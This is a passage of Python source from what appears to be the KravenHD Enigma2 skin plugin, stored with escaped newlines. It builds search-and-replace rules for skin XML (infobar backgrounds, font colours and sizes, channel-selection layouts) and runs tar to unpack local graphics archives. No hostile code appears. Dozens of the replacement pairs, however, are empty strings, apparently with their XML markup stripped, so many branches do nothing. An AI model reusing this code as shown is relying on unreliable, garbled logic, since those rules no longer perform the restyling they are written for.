\"channelselection-style-nobile-minitv3\"):\n\t\t\tself.skinSearchAndReplace.append(['render=\"KravenHDMenuPig\"', 'render=\"Pig\"'])\n\n\t\tif self.actMenustyle == \"minitv\":\n\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\telif self.actMenustyle == \"logo\":\n\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\telif self.actMenustyle == \"metrix-icons\":\n\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\telse:\n\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\tself.skinSearchAndReplace.append(['', ''])\n\n\t\t### check/install graphics (HD / FHD)\n\t\tgraphpackfile = \"/usr/share/enigma2/KravenHD/graphpackfile\"\n\t\tgraphpackname = \" \"\n\t\tif fileExists(graphpackfile):\n\t\t\tpFile = open(graphpackfile, \"r\")\n\t\t\tfor line in pFile:\n\t\t\t\tgraphpackname = line.strip('\\n')\n\t\t\tpFile.close()\n\t\t\tif graphpackname != config.plugins.KravenHD.SkinResolution.value:\n\t\t\t\tconsole1 = eConsoleAppContainer()\n\t\t\t\tif config.plugins.KravenHD.SkinResolution.value == \"hd\":\n\t\t\t\t\tconsole1.execute(\"tar xf /usr/lib/enigma2/python/Plugins/Extensions/KravenHD/data/HD/share.tar.gz -C /usr/share/enigma2/KravenHD/\")\n\t\t\t\t\tprint (\"KravenPlugin: HD graphics now installed\")\n\t\t\t\telse:\n\t\t\t\t\tconsole1.execute(\"tar xf /usr/lib/enigma2/python/Plugins/Extensions/KravenHD/data/FHD/share.tar.gz -C /usr/share/enigma2/KravenHD/\")\n\t\t\t\t\tprint (\"KravenPlugin: FHD graphics now installed\")\n\t\t\telse:\n\t\t\t\tprint (\"KravenPlugin: No need to install other graphics\")\n\n\t\t### Mainmenu Fontsize\n\t\tif config.plugins.KravenHD.MainmenuFontsize.value == \"mainmenu-small\":\n\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\telif config.plugins.KravenHD.MainmenuFontsize.value == \"mainmenu-middle\":\n\t\t\tself.skinSearchAndReplace.append(['', ''])\n\n\t\t### Infobar. 
Background-Style\n\t\tif config.plugins.KravenHD.IBStyle.value == \"box\":\n\n\t\t\t### Infobar - Background\n\t\t\tself.skinSearchAndReplace.append(['', 'zPosition=\"-8\" />'])\n\n\t\t\t### Infobar - Line\n\t\t\tself.skinSearchAndReplace.append(['name=\"KravenIBLine\" value=\"#00ffffff', 'name=\"KravenIBLine\" value=\"#00' + config.plugins.KravenHD.IBLine.value])\n\n\t\t\t### Infobar\n\t\t\tif config.plugins.KravenHD.InfobarBoxColor.value == \"gradient\":\n\t\t\t\tif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-x2\", \"infobar-style-z1\"):\n\t\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\n\t\t\t\tif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-x2\", \"infobar-style-x3\"):\n\t\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\t\telif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-z1\", \"infobar-style-z2\"):\n\t\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\t\telif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-nopicon\", \"infobar-style-x1\", \"infobar-style-zz1\", \"infobar-style-zzz1\"):\n\t\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\t\telif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-zz2\", \"infobar-style-zz3\"):\n\t\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\n\t\t\telif config.plugins.KravenHD.InfobarBoxColor.value == \"texture\":\n\t\t\t\tif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-x2\", \"infobar-style-z1\"):\n\t\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\n\t\t\t\tif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-x2\", \"infobar-style-x3\"):\n\t\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\t\telif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-z1\", \"infobar-style-z2\"):\n\t\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\t\telif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-nopicon\", \"infobar-style-x1\", \"infobar-style-zz1\", \"infobar-style-zzz1\"):\n\t\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\t\telif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-zz2\", \"infobar-style-zz3\"):\n\t\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\n\t\t\telse:\n\t\t\t\tif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-x2\", \"infobar-style-z1\"):\n\t\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\n\t\t\t\tif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-x2\", \"infobar-style-x3\"):\n\t\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\t\telif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-z1\", \"infobar-style-z2\"):\n\t\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\t\telif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-nopicon\", \"infobar-style-x1\", \"infobar-style-zz1\", \"infobar-style-zzz1\"):\n\t\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\t\telif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-zz2\", \"infobar-style-zz3\"):\n\t\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\n\t\t\t### NetatmoBar - Background\n\t\t\tif config.plugins.KravenHD.InfobarBoxColor.value == \"gradient\":\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\telif config.plugins.KravenHD.InfobarBoxColor.value == \"texture\":\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\telse:\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\n\t\t\t### SIB - Background\n\t\t\tif config.plugins.KravenHD.InfobarBoxColor.value == 
\"gradient\":\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\telif config.plugins.KravenHD.InfobarBoxColor.value == \"texture\":\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\telse:\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\n\t\t\t### clock-android - ibar-Position\n\t\t\tif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-x2\", \"infobar-style-x3\", \"infobar-style-z1\", \"infobar-style-z2\") and self.actClockstyle == \"clock-android\":\n\t\t\t\tif config.plugins.KravenHD.SkinResolution.value == \"hd\":\n\t\t\t\t\tself.skinSearchAndReplace.append(['position=\"0,576\" size=\"1280,144\"', 'position=\"0,566\" size=\"1280,154\"'])\n\t\t\t\t\tself.skinSearchAndReplace.append(['position=\"0,576\" size=\"1280,2\"', 'position=\"0,566\" size=\"1280,2\"'])\n\t\t\t\t\tself.skinSearchAndReplace.append(['position=\"0,580\" size=\"1280,140\"', 'position=\"0,566\" size=\"1280,154\"'])\n\t\t\t\t\tself.skinSearchAndReplace.append(['position=\"0,580\" size=\"1280,2\"', 'position=\"0,566\" size=\"1280,2\"'])\n\t\t\t\telse:\n\t\t\t\t\tself.skinSearchAndReplace.append(['position=\"0,864\" size=\"1920,216\"', 'position=\"0,849\" size=\"1920,231\"'])\n\t\t\t\t\tself.skinSearchAndReplace.append(['position=\"0,864\" size=\"1920,3\"', 'position=\"0,849\" size=\"1920,3\"'])\n\t\t\t\t\tself.skinSearchAndReplace.append(['position=\"0,870\" size=\"1920,210\"', 'position=\"0,849\" size=\"1920,231\"'])\n\t\t\t\t\tself.skinSearchAndReplace.append(['position=\"0,870\" size=\"1920,3\"', 'position=\"0,849\" size=\"1920,3\"'])\n\n\t\t\t### EMCMediaCenter, MoviePlayer, DVDPlayer - Background\n\t\t\tif config.plugins.KravenHD.InfobarBoxColor.value == \"gradient\":\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\telif config.plugins.KravenHD.InfobarBoxColor.value == \"texture\":\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\telse:\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\n\t\t\t### EPGSelectionEPGBar - Background\n\t\t\tif config.plugins.KravenHD.InfobarBoxColor.value == \"gradient\":\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\telif config.plugins.KravenHD.InfobarBoxColor.value == \"texture\":\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\telse:\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\n\t\t\t### ChannelSelectionRadio\n\t\t\tif config.plugins.KravenHD.InfobarBoxColor.value == \"gradient\":\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\telif config.plugins.KravenHD.InfobarBoxColor.value == \"texture\":\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\telse:\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\n\t\t\t### RadioInfoBar\n\t\t\tif config.plugins.KravenHD.InfobarBoxColor.value == \"gradient\":\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\telif config.plugins.KravenHD.InfobarBoxColor.value == \"texture\":\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\telse:\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\n\t\t\t### GraphicalInfoBarEPG, QuickEPG\n\t\t\tif config.plugins.KravenHD.InfobarBoxColor.value == \"gradient\":\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\telif config.plugins.KravenHD.InfobarBoxColor.value == \"texture\":\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\telse:\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\n\t\t\t### InfoBarEventView\n\t\t\tif config.plugins.KravenHD.InfobarBoxColor.value == \"gradient\":\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\telif 
config.plugins.KravenHD.InfobarBoxColor.value == \"texture\":\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\telse:\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\n\t\t\t### MediaPortal-Player\n\t\t\tif fileExists(\"/usr/lib/enigma2/python/Plugins/Extensions/MediaPortal/plugin.py\") and config.plugins.KravenHD.MediaPortal.value == \"mediaportal\":\n\t\t\t\tif config.plugins.KravenHD.InfobarBoxColor.value == \"gradient\":\n\t\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\t\telif config.plugins.KravenHD.InfobarBoxColor.value == \"texture\":\n\t\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\t\telse:\n\t\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\n\t\telse:\n\t\t\t### Infobar\n\t\t\tif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-x2\", \"infobar-style-z1\"):\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\n\t\t\tif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-x2\", \"infobar-style-x3\"):\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\telif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-z1\", \"infobar-style-z2\"):\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\telif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-nopicon\", \"infobar-style-x1\", \"infobar-style-zz1\", \"infobar-style-zzz1\"):\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\telif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-zz2\", \"infobar-style-zz3\"):\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\n\t\t\t### MediaPortal-Player\n\t\t\tif fileExists(\"/usr/lib/enigma2/python/Plugins/Extensions/MediaPortal/plugin.py\") and config.plugins.KravenHD.MediaPortal.value == \"mediaportal\":\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\n\t\t### Font Colors\n\t\tself.skinSearchAndReplace.append(['name=\"KravenFont1\" value=\"#00ffffff', 'name=\"KravenFont1\" value=\"#00' + config.plugins.KravenHD.Font1.value])\n\t\tself.skinSearchAndReplace.append(['name=\"KravenFont2\" value=\"#00F0A30A', 'name=\"KravenFont2\" value=\"#00' + config.plugins.KravenHD.Font2.value])\n\t\tself.skinSearchAndReplace.append(['name=\"foreground\" value=\"#00dddddd', 'name=\"foreground\" value=\"#00' + config.plugins.KravenHD.Font1.value])\n\t\tself.skinSearchAndReplace.append(['name=\"KravenIBFont1\" value=\"#00ffffff', 'name=\"KravenIBFont1\" value=\"#00' + config.plugins.KravenHD.IBFont1.value])\n\t\tself.skinSearchAndReplace.append(['name=\"KravenIBFont2\" value=\"#00F0A30A', 'name=\"KravenIBFont2\" value=\"#00' + config.plugins.KravenHD.IBFont2.value])\n\t\tself.skinSearchAndReplace.append(['name=\"KravenIBGFont1\" value=\"#00ffffff', 'name=\"KravenIBGFont1\" value=\"#00' + config.plugins.KravenHD.IBFont1.value])\n\t\tself.skinSearchAndReplace.append(['name=\"KravenIBGFont2\" value=\"#00F0A30A', 'name=\"KravenIBGFont2\" value=\"#00' + config.plugins.KravenHD.IBFont2.value])\n\t\tself.skinSearchAndReplace.append(['name=\"KravenPermanentClock\" value=\"#00ffffff', 'name=\"KravenPermanentClock\" value=\"#00' + config.plugins.KravenHD.PermanentClockFont.value])\n\t\tself.skinSearchAndReplace.append(['name=\"KravenSelFont\" value=\"#00ffffff', 'name=\"KravenSelFont\" value=\"#00' + config.plugins.KravenHD.SelectionFont.value])\n\t\tself.skinSearchAndReplace.append(['name=\"KravenSelection\" value=\"#000050EF', 'name=\"KravenSelection\" value=\"#00' + config.plugins.KravenHD.SelectionBackground.value])\n\t\tif config.plugins.KravenHD.EMCSelectionColors.value == 
\"global\":\n\t\t\tself.skinSearchAndReplace.append(['name=\"KravenEMCSelFont\" value=\"#00ffffff', 'name=\"KravenEMCSelFont\" value=\"#00' + config.plugins.KravenHD.SelectionFont.value])\n\t\t\tself.skinSearchAndReplace.append(['name=\"KravenEMCSelection\" value=\"#000050EF', 'name=\"KravenEMCSelection\" value=\"#00' + config.plugins.KravenHD.SelectionBackground.value])\n\t\telse:\n\t\t\tself.skinSearchAndReplace.append(['name=\"KravenEMCSelFont\" value=\"#00ffffff', 'name=\"KravenEMCSelFont\" value=\"#00' + config.plugins.KravenHD.EMCSelectionFont.value])\n\t\t\tself.skinSearchAndReplace.append(['name=\"KravenEMCSelection\" value=\"#000050EF', 'name=\"KravenEMCSelection\" value=\"#00' + config.plugins.KravenHD.EMCSelectionBackground.value])\n\t\tself.skinSearchAndReplace.append(['name=\"selectedFG\" value=\"#00ffffff', 'name=\"selectedFG\" value=\"#00' + config.plugins.KravenHD.SelectionFont.value])\n\t\tself.skinSearchAndReplace.append(['name=\"KravenMarked\" value=\"#00ffffff', 'name=\"KravenMarked\" value=\"#00' + config.plugins.KravenHD.MarkedFont.value])\n\t\tself.skinSearchAndReplace.append(['name=\"KravenECM\" value=\"#00ffffff', 'name=\"KravenECM\" value=\"#00' + config.plugins.KravenHD.ECMFont.value])\n\t\tself.skinSearchAndReplace.append(['name=\"KravenName\" value=\"#00ffffff', 'name=\"KravenName\" value=\"#00' + config.plugins.KravenHD.ChannelnameFont.value])\n\t\tself.skinSearchAndReplace.append(['name=\"KravenButton\" value=\"#00ffffff', 'name=\"KravenButton\" value=\"#00' + config.plugins.KravenHD.ButtonText.value])\n\t\tself.skinSearchAndReplace.append(['name=\"KravenAndroid\" value=\"#00ffffff', 'name=\"KravenAndroid\" value=\"#00' + config.plugins.KravenHD.Android.value])\n\t\tself.skinSearchAndReplace.append(['name=\"KravenAndroid2\" value=\"#00ffffff', 'name=\"KravenAndroid2\" value=\"#00' + config.plugins.KravenHD.Android2.value])\n\t\tself.skinSearchAndReplace.append(['name=\"KravenPrime\" value=\"#0070AD11', 'name=\"KravenPrime\" value=\"#00' + config.plugins.KravenHD.PrimetimeFont.value])\n\t\tself.skinSearchAndReplace.append(['name=\"KravenMainmenuHorTitleFont\" value=\"#00999999', 'name=\"KravenMainmenuHorTitleFont\" value=\"#00' + config.plugins.KravenHD.MainmenuHorTitleFont.value])\n\n\t\t### Infobar (Serviceevent) Font-Size\n\t\tif config.plugins.KravenHD.SkinResolution.value == \"hd\":\n\t\t\tif config.plugins.KravenHD.IBFontSize.value == \"small\":\n\t\t\t\tself.skinSearchAndReplace.append(['font=\"Regular;30\" position=\"545,553\" size=\"500,38\"', 'font=\"Regular;22\" position=\"545,560\" size=\"500,27\"']) # ZZ1 now\n\t\t\t\tself.skinSearchAndReplace.append(['font=\"Regular;30\" position=\"545,643\" size=\"393,38\"', 'font=\"Regular;22\" position=\"545,650\" size=\"393,27\"']) # ZZ1 next\n\t\t\t\tself.skinSearchAndReplace.append(['font=\"Regular;30\" position=\"545,526\" size=\"500,38\"', 'font=\"Regular;22\" position=\"545,533\" size=\"500,27\"']) # ZZZ1 now\n\t\t\t\tself.skinSearchAndReplace.append(['font=\"Regular;30\" position=\"545,616\" size=\"393,38\"', 'font=\"Regular;22\" position=\"545,623\" size=\"393,27\"']) # ZZZ1 next\n\t\t\t\tself.skinSearchAndReplace.append(['font=\"Regular;30\" position=\"438,614\" size=\"472,38\"', 'font=\"Regular;22\" position=\"438,621\" size=\"472,27\"']) # ZZ2, ZZ3 now\n\t\t\t\tself.skinSearchAndReplace.append(['font=\"Regular;30\" position=\"510,666\" size=\"437,38\"', 'font=\"Regular;22\" position=\"510,673\" size=\"437,27\"']) # ZZ3 next\n\t\t\t\tself.skinSearchAndReplace.append(['font=\"Regular;30\" 
position=\"430,614\" size=\"481,38\"', 'font=\"Regular;22\" position=\"430,621\" size=\"481,27\"']) # X2, X3, Z1, Z2 now\n\t\t\t\tself.skinSearchAndReplace.append(['font=\"Regular;30\" position=\"430,666\" size=\"481,38\"', 'font=\"Regular;22\" position=\"430,673\" size=\"481,27\"']) # X2, X3, Z1, Z2 next\n\t\t\t\tself.skinSearchAndReplace.append(['font=\"Regular;30\" position=\"430,558\" size=\"481,38\"', 'font=\"Regular;22\" position=\"430,565\" size=\"481,27\"']) # X1 now\n\t\t\t\tself.skinSearchAndReplace.append(['font=\"Regular;30\" position=\"430,649\" size=\"481,38\"', 'font=\"Regular;22\" position=\"430,656\" size=\"481,27\"']) # X1 next\n\t\t\t\tself.skinSearchAndReplace.append(['font=\"Regular;30\" position=\"199,584\" size=\"708,38\"', 'font=\"Regular;22\" position=\"199,591\" size=\"708,27\"']) # no picon now\n\t\t\t\tself.skinSearchAndReplace.append(['font=\"Regular;30\" position=\"199,636\" size=\"708,38\"', 'font=\"Regular;22\" position=\"199,643\" size=\"708,27\"']) # no picon next\n\t\t\telif config.plugins.KravenHD.IBFontSize.value == \"middle\":\n\t\t\t\tself.skinSearchAndReplace.append(['font=\"Regular;30\" position=\"545,553\" size=\"500,38\"', 'font=\"Regular;26\" position=\"545,556\" size=\"500,33\"']) # ZZ1 now\n\t\t\t\tself.skinSearchAndReplace.append(['font=\"Regular;30\" position=\"545,643\" size=\"393,38\"', 'font=\"Regular;26\" position=\"545,646\" size=\"393,33\"']) # ZZ1 next\n\t\t\t\tself.skinSearchAndReplace.append(['font=\"Regular;30\" position=\"545,526\" size=\"500,38\"', 'font=\"Regular;26\" position=\"545,529\" size=\"500,33\"']) # ZZZ1 now\n\t\t\t\tself.skinSearchAndReplace.append(['font=\"Regular;30\" position=\"545,616\" size=\"393,38\"', 'font=\"Regular;26\" position=\"545,619\" size=\"393,33\"']) # ZZZ1 next\n\t\t\t\tself.skinSearchAndReplace.append(['font=\"Regular;30\" position=\"438,614\" size=\"472,38\"', 'font=\"Regular;26\" position=\"438,617\" size=\"472,33\"']) # ZZ2, ZZ3 now\n\t\t\t\tself.skinSearchAndReplace.append(['font=\"Regular;30\" position=\"510,666\" size=\"437,38\"', 'font=\"Regular;26\" position=\"510,669\" size=\"437,33\"']) # ZZ3 next\n\t\t\t\tself.skinSearchAndReplace.append(['font=\"Regular;30\" position=\"430,614\" size=\"481,38\"', 'font=\"Regular;26\" position=\"430,617\" size=\"481,33\"']) # X2, X3, Z1, Z2 now\n\t\t\t\tself.skinSearchAndReplace.append(['font=\"Regular;30\" position=\"430,666\" size=\"481,38\"', 'font=\"Regular;26\" position=\"430,669\" size=\"481,33\"']) # X2, X3, Z1, Z2 next\n\t\t\t\tself.skinSearchAndReplace.append(['font=\"Regular;30\" position=\"430,558\" size=\"481,38\"', 'font=\"Regular;26\" position=\"430,561\" size=\"481,33\"']) # X1 now\n\t\t\t\tself.skinSearchAndReplace.append(['font=\"Regular;30\" position=\"430,649\" size=\"481,38\"', 'font=\"Regular;26\" position=\"430,652\" size=\"481,33\"']) # X1 next\n\t\t\t\tself.skinSearchAndReplace.append(['font=\"Regular;30\" position=\"199,584\" size=\"708,38\"', 'font=\"Regular;26\" position=\"199,587\" size=\"708,33\"']) # no picon now\n\t\t\t\tself.skinSearchAndReplace.append(['font=\"Regular;30\" position=\"199,636\" size=\"708,38\"', 'font=\"Regular;26\" position=\"199,639\" size=\"708,33\"']) # no picon next\n\t\telse:\n\t\t\tif config.plugins.KravenHD.IBFontSize.value == \"small\":\n\t\t\t\tself.skinSearchAndReplace.append(['font=\"Regular;45\" position=\"817,830\" size=\"750,55\"', 'font=\"Regular;33\" position=\"817,839\" size=\"750,42\"']) # ZZ1 now\n\t\t\t\tself.skinSearchAndReplace.append(['font=\"Regular;45\" position=\"817,965\" 
size=\"589,55\"', 'font=\"Regular;33\" position=\"817,974\" size=\"589,42\"']) # ZZ1 next\n\t\t\t\tself.skinSearchAndReplace.append(['font=\"Regular;45\" position=\"817,790\" size=\"750,55\"', 'font=\"Regular;33\" position=\"817,799\" size=\"750,42\"']) # ZZZ1 now\n\t\t\t\tself.skinSearchAndReplace.append(['font=\"Regular;45\" position=\"817,925\" size=\"589,55\"', 'font=\"Regular;33\" position=\"817,931\" size=\"589,42\"']) # ZZZ1 next\n\t\t\t\tself.skinSearchAndReplace.append(['font=\"Regular;45\" position=\"657,921\" size=\"708,55\"', 'font=\"Regular;33\" position=\"657,930\" size=\"708,42\"']) # ZZ2, ZZ3 now\n\t\t\t\tself.skinSearchAndReplace.append(['font=\"Regular;45\" position=\"765,999\" size=\"655,55\"', 'font=\"Regular;33\" position=\"765,1008\" size=\"655,42\"']) # ZZ3 next\n\t\t\t\tself.skinSearchAndReplace.append(['font=\"Regular;45\" position=\"644,921\" size=\"722,55\"', 'font=\"Regular;33\" position=\"644,930\" size=\"722,42\"']) # X2, X3, Z1, Z2 now\n\t\t\t\tself.skinSearchAndReplace.append(['font=\"Regular;45\" position=\"644,999\" size=\"722,55\"', 'font=\"Regular;33\" position=\"644,1008\" size=\"722,42\"']) # X2, X3, Z1, Z2 next\n\t\t\t\tself.skinSearchAndReplace.append(['font=\"Regular;45\" position=\"644,837\" size=\"722,55\"', 'font=\"Regular;33\" position=\"644,846\" size=\"722,42\"']) # X1 now\n\t\t\t\tself.skinSearchAndReplace.append(['font=\"Regular;45\" position=\"644,972\" size=\"722,55\"', 'font=\"Regular;33\" position=\"644,981\" size=\"722,42\"']) # X1 next\n\t\t\t\tself.skinSearchAndReplace.append(['font=\"Regular;45\" position=\"298,876\" size=\"1061,55\"', 'font=\"Regular;33\" position=\"298,885\" size=\"1061,42\"']) # no picon now\n\t\t\t\tself.skinSearchAndReplace.append(['font=\"Regular;45\" position=\"298,954\" size=\"1061,55\"', 'font=\"Regular;33\" position=\"298,963\" size=\"1061,42\"']) # no picon next\n\t\t\telif config.plugins.KravenHD.IBFontSize.value == \"middle\":\n\t\t\t\tself.skinSearchAndReplace.append(['font=\"Regular;45\" position=\"817,830\" size=\"750,55\"', 'font=\"Regular;39\" position=\"817,833\" size=\"750,49\"']) # ZZ1 now\n\t\t\t\tself.skinSearchAndReplace.append(['font=\"Regular;45\" position=\"817,965\" size=\"589,55\"', 'font=\"Regular;39\" position=\"817,968\" size=\"589,49\"']) # ZZ1 next\n\t\t\t\tself.skinSearchAndReplace.append(['font=\"Regular;45\" position=\"817,790\" size=\"750,55\"', 'font=\"Regular;39\" position=\"817,793\" size=\"750,49\"']) # ZZZ1 now\n\t\t\t\tself.skinSearchAndReplace.append(['font=\"Regular;45\" position=\"817,925\" size=\"589,55\"', 'font=\"Regular;39\" position=\"817,928\" size=\"589,49\"']) # ZZZ1 next\n\t\t\t\tself.skinSearchAndReplace.append(['font=\"Regular;45\" position=\"657,921\" size=\"708,55\"', 'font=\"Regular;39\" position=\"657,924\" size=\"708,49\"']) # ZZ2, ZZ3 now\n\t\t\t\tself.skinSearchAndReplace.append(['font=\"Regular;45\" position=\"765,999\" size=\"655,55\"', 'font=\"Regular;39\" position=\"765,1002\" size=\"655,49\"']) # ZZ3 next\n\t\t\t\tself.skinSearchAndReplace.append(['font=\"Regular;45\" position=\"644,921\" size=\"722,55\"', 'font=\"Regular;39\" position=\"644,924\" size=\"722,49\"']) # X2, X3, Z1, Z2 now\n\t\t\t\tself.skinSearchAndReplace.append(['font=\"Regular;45\" position=\"644,999\" size=\"722,55\"', 'font=\"Regular;39\" position=\"644,1002\" size=\"722,49\"']) # X2, X3, Z1, Z2 next\n\t\t\t\tself.skinSearchAndReplace.append(['font=\"Regular;45\" position=\"644,837\" size=\"722,55\"', 'font=\"Regular;39\" position=\"644,840\" size=\"722,49\"']) # X1 
now\n\t\t\t\tself.skinSearchAndReplace.append(['font=\"Regular;45\" position=\"644,972\" size=\"722,55\"', 'font=\"Regular;39\" position=\"644,975\" size=\"722,49\"']) # X1 next\n\t\t\t\tself.skinSearchAndReplace.append(['font=\"Regular;45\" position=\"298,876\" size=\"1061,55\"', 'font=\"Regular;39\" position=\"298,879\" size=\"1061,49\"']) # no picon now\n\t\t\t\tself.skinSearchAndReplace.append(['font=\"Regular;45\" position=\"298,954\" size=\"1061,55\"', 'font=\"Regular;39\" position=\"298,957\" size=\"1061,49\"']) # no picon next\n\n\t\t### ChannelSelection (Event-Description) Font-Size and Primetime\n\t\tif self.actChannelselectionstyle == \"channelselection-style-minitv3\":\n\t\t\tif config.plugins.KravenHD.Primetimeavailable.value == \"primetime-on\" and config.plugins.KravenHD.ChannelSelectionEPGSize3.value == \"big\":\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\telif config.plugins.KravenHD.Primetimeavailable.value == \"none\" and config.plugins.KravenHD.ChannelSelectionEPGSize3.value == \"big\":\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\telif config.plugins.KravenHD.Primetimeavailable.value == \"primetime-on\" and config.plugins.KravenHD.ChannelSelectionEPGSize3.value == \"small\":\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\telif self.actChannelselectionstyle == \"channelselection-style-nobile-minitv3\":\n\t\t\tif config.plugins.KravenHD.Primetimeavailable.value == \"primetime-on\" and config.plugins.KravenHD.ChannelSelectionEPGSize1.value == \"big\":\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\telif config.plugins.KravenHD.Primetimeavailable.value == \"none\" and config.plugins.KravenHD.ChannelSelectionEPGSize1.value == \"big\":\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\telif config.plugins.KravenHD.Primetimeavailable.value == \"primetime-on\" and config.plugins.KravenHD.ChannelSelectionEPGSize1.value == \"small\":\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\telif self.actChannelselectionstyle in (\"channelselection-style-nobile\", \"channelselection-style-nobile2\", \"channelselection-style-nobile-minitv\", \"channelselection-style-nobile-minitv3\", \"channelselection-style-nobile-minitv33\"):\n\t\t\tif config.plugins.KravenHD.Primetimeavailable.value == \"primetime-on\" and config.plugins.KravenHD.ChannelSelectionEPGSize1.value == \"big\":\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\telif config.plugins.KravenHD.Primetimeavailable.value == \"none\" and config.plugins.KravenHD.ChannelSelectionEPGSize1.value == \"big\":\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\telif config.plugins.KravenHD.Primetimeavailable.value == \"primetime-on\" and config.plugins.KravenHD.ChannelSelectionEPGSize1.value == \"small\":\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\telif self.actChannelselectionstyle == \"channelselection-style-minitv22\":\n\t\t\tif config.plugins.KravenHD.Primetimeavailable.value == \"primetime-on\" and config.plugins.KravenHD.ChannelSelectionEPGSize2.value == \"big\":\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\telif config.plugins.KravenHD.Primetimeavailable.value == \"none\" and config.plugins.KravenHD.ChannelSelectionEPGSize2.value == \"big\":\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\telif config.plugins.KravenHD.Primetimeavailable.value == \"primetime-on\" and config.plugins.KravenHD.ChannelSelectionEPGSize2.value == \"small\":\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\telse:\n\t\t\tif 
